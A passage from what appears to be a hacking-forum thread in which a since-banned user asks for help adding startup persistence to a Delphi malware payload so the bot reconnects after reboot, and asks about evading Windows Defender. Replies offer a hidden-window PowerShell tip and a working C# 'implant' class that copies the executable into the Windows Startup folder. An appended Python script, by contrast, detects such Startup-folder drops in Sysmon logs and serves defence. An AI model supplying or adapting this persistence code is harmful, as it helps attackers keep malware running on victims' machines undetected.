
Add startup to an EXE payload?

Evild34d

(L3) cache
Banned
Registered
18.05.2021
Messages
297
Reactions
29
Deal guarantor
2
Please note that this user is banned
Hi,

I have a malware payload which is coded in Delphi, without startup. I need your help to add startup to the payload (exe); any code/method that works, please! Only adding startup is enough.

Thanks for any help
 
So using this method, the startup feature will connect the bot again when the user's PC restarts? Thanks
-WindowStyle Hidden

https:// www(dot)hanselman(dot)com /blog/running-powershell-scripts-from-the-command-line-in-a-hidden-window

https:// www(dot)codeproject(dot)com /Questions/884878/how-to-start-the-windows-application-when-the-star

reaction is appreciated ♥️
 
C#:
using System;
using System.IO;
using System.Reflection;

namespace WireTap.Evasion
{
    internal sealed class Startup
    {

        /// <summary>
        /// Current executable location
        /// </summary>
        private static readonly FileInfo CurrentExecutable = new FileInfo(Assembly.GetExecutingAssembly().Location);

        /// <summary>
        /// Shell startup directory path
        /// Any file in this dir will be executed after user logged in.
        /// </summary>
        private static readonly DirectoryInfo ShellStartupDirectory = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup));


        /// <summary>
        /// Installs the application by copying the current executable to the Shell Startup directory.
        /// </summary>
        public static string Install()
        {
            FileInfo ImplantShellStartupExecutable = new FileInfo(Path.Combine(ShellStartupDirectory.FullName, CurrentExecutable.Name));

            // Create startup dir if not exists
            if (!ShellStartupDirectory.Exists)
            {
                ShellStartupDirectory.Create();
            }

            // If the executable does not already exist in the Shell Startup directory, copy it there.
            if (!ImplantShellStartupExecutable.Exists)
            {
                CurrentExecutable.CopyTo(ImplantShellStartupExecutable.FullName);
#if DEBUG
                Console.WriteLine("Implant installed");
#endif
                return ImplantShellStartupExecutable.FullName;
            }
            return null;
        }
    }
}
 
Thanks but this will not cause WD detection!
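
From the defender's side, the Startup-folder copy in the C# snippet above leaves a file-creation event that is straightforward to hunt for. The following added example (not part of the thread) runs that check over constructed Sysmon FileCreate (Event ID 11) records; the field names `Image` and `TargetFilename` follow Sysmon, while the extension list and verdict names are assumptions chosen for illustration.

```python
import ntpath

# Startup folder suffixes (per-user and all-users), compared case-insensitively.
STARTUP_DIRS = (
    r"\appdata\roaming\microsoft\windows\start menu\programs\startup",
    r"\programdata\microsoft\windows\start menu\programs\startup",
)
# File types that run at logon when placed there; a tunable assumption.
RUNNABLE_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".lnk"}


def classify(event):
    """Return None, 'startup-drop' or 'startup-self-copy' for one FileCreate event."""
    target = event["TargetFilename"]
    folder, name = ntpath.split(target.lower())
    if not folder.endswith(STARTUP_DIRS):
        return None
    if ntpath.splitext(name)[1] not in RUNNABLE_EXT:
        return None
    # The C# snippet copies the running binary under its own name, so the
    # writing process and the dropped file share a file name.
    writer = ntpath.basename(event["Image"].lower())
    return "startup-self-copy" if writer == name else "startup-drop"


def scan(events):
    """Yield (verdict, event) for every event that classify() flags."""
    for ev in events:
        verdict = classify(ev)
        if verdict:
            yield verdict, ev


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\Downloads\updater.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notes.lnk"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\alice\Documents\todo.txt"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini"},
]

if __name__ == "__main__":
    for verdict, ev in scan(SAMPLE_EVENTS):
        print(f"{verdict}: {ev['Image']} -> {ev['TargetFilename']}")
```

A `startup-self-copy` verdict is the higher-priority one to triage; a `startup-drop` written by `explorer.exe` is usually a user-created shortcut.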
 

